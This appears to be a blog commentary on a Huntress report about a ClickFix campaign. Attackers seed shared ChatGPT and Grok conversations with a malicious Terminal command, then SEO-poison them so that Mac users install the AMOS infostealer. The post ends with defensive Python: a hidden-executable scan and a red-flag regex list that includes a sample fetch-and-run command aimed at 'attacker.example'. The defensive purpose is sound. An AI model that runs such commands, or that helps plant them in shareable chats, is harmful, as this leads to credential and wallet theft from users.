According to Dark Reading, a new ClickFix-style attack is using SEO-poisoned links to real ChatGPT and Grok conversations to deliver infostealer malware. Huntress researchers Stuart Ashenbrenner and Jonathan Semon detailed the attack, which targeted a customer on December 5. The victim searched for help cleaning a Mac hard drive, clicked a first-page Google result that led to a genuine ChatGPT or Grok chat, and followed instructions that silently installed the AMOS stealer. The attack bypassed macOS protections with no malicious download and no security warnings, relying entirely on the user copying and pasting a malicious terminal command. Semon believes this method could become a dominant initial access vector for malware over the next 6 to 18 months.
Why This Is So Sneaky
Here’s the thing: this attack doesn’t break any digital locks. It doesn’t exploit a software bug. It exploits trust. And that’s way harder to patch. Think about it. You Google a problem, you see a link to chat.openai.com or x.ai/grok—these are legitimate domains. You click, you’re on the real platform. The conversation looks like a normal troubleshooting session. Your guard is down because you didn’t click some sketchy .xyz link in a phishing email. You’re just trying to free up disk space!
But the command you’re told to paste into Terminal? It talks directly to an attacker’s server, downloading and executing the AMOS stealer. As the Huntress blog puts it, there’s “No malicious download. No security warnings.” Just a copy-paste into a “full-blown persistent data leak.” The malware then harvests everything: passwords, crypto wallets, browser data. It’s frighteningly elegant in its simplicity, sidestepping the victim’s mental threat model by making the malicious action feel productive and safe.
The SEO Poisoning Engine
So how does a malicious ChatGPT chat end up on Google’s first page? The attacker engineers a prompt that looks like legitimate help but contains the bad command. They then use the platform’s “share” feature to create a public link to that conversation. Now they have a credible-looking URL on a trusted domain. Next, they spam that link across forums, content farms, and Telegram channels to artificially boost its search ranking for specific keywords—like “clean Mac hard drive.” This is classic SEO poisoning, but with a terrifyingly credible payload.
This is a breakthrough for criminals. Traditional phishing battles user instinct—a weird email feels off. But this? It feels like you’re using a tool to solve a problem. The attackers have basically found a way to weaponize our growing reliance on AI assistants. And as Huntress notes, this isn’t just a Mac problem. The same tactic would work flawlessly on Windows with a PowerShell command. The platform is irrelevant; the psychology is universal.
What Can You Actually Do?
Defending against this is tricky because it looks like normal activity. For IT and security teams, Huntress suggests monitoring for behavioral anomalies, like the `osascript` utility suddenly asking for credentials or hidden executables popping up in home directories. For everyone else, the advice is simple but hard: do not blindly execute terminal commands from any source you don’t absolutely trust. Not from an AI, not from a forum, not even from a blog (irony noted).
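One of those signals, hidden executables appearing in home directories, is easy to approximate. Here's a minimal sketch of that single heuristic in Python; it is not Huntress's actual detection logic, and a real EDR would also check code signing, quarantine attributes, and process lineage.

```python
import os
import stat

def find_hidden_executables(home: str) -> list[str]:
    """Flag dot-prefixed files with an executable bit set -- a crude
    stand-in for the 'hidden executables in home directories' signal.
    Purely illustrative; real tooling correlates far more context."""
    hits = []
    for entry in os.scandir(home):
        # Only dotfiles (hidden on macOS/Linux) that are regular files.
        if not entry.name.startswith("."):
            continue
        if not entry.is_file(follow_symlinks=False):
            continue
        mode = entry.stat(follow_symlinks=False).st_mode
        # Executable by user, group, or other is the red flag here.
        if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            hits.append(entry.path)
    return hits
```

On its own this would flag plenty of benign dotfiles too (shell scripts, tool shims), which is why Huntress frames these as behavioral anomalies to investigate, not automatic verdicts.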
This is a stark reminder that AI outputs are not truth. They’re probabilistic text generation. Treating them as an authoritative source for system-level commands is a massive risk. Use strong, unique passwords and a password manager so a stealer gets less useful data. And maybe, just maybe, think twice next time you’re about to paste that convenient one-line fix into your terminal. Is it solving your problem, or creating a much bigger one? The scary part is, with this new ClickFix method, you probably won’t know until it’s too late.
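If you want a concrete habit to go with that advice, here's a tiny sketch of a "look before you paste" screener. The regex patterns and the reasons attached to them are my own illustrative picks, not indicators from the actual AMOS lure:

```python
import re

# Common red flags in pasted one-liners. Illustrative, not exhaustive.
RED_FLAGS = [
    (r"curl\s+[^|;&]*\|\s*(ba)?sh", "pipes a remote download straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes hidden base64 content"),
    (r"osascript", "runs AppleScript, often used to spoof password prompts"),
    (r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine", "strips Gatekeeper's quarantine flag"),
    (r"(sudo\s+)?rm\s+-rf", "recursively deletes files"),
]

def screen_command(cmd: str) -> list[str]:
    """Return human-readable reasons a command deserves a second look."""
    return [why for pattern, why in RED_FLAGS if re.search(pattern, cmd)]
```

So `screen_command("curl -s https://attacker.example/x | bash")` (a made-up URL) returns a warning, while `screen_command("ls -la")` returns nothing. A determined attacker can obfuscate past any static list like this, so treat it as a speed bump that buys you a moment of skepticism, not a safety guarantee.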
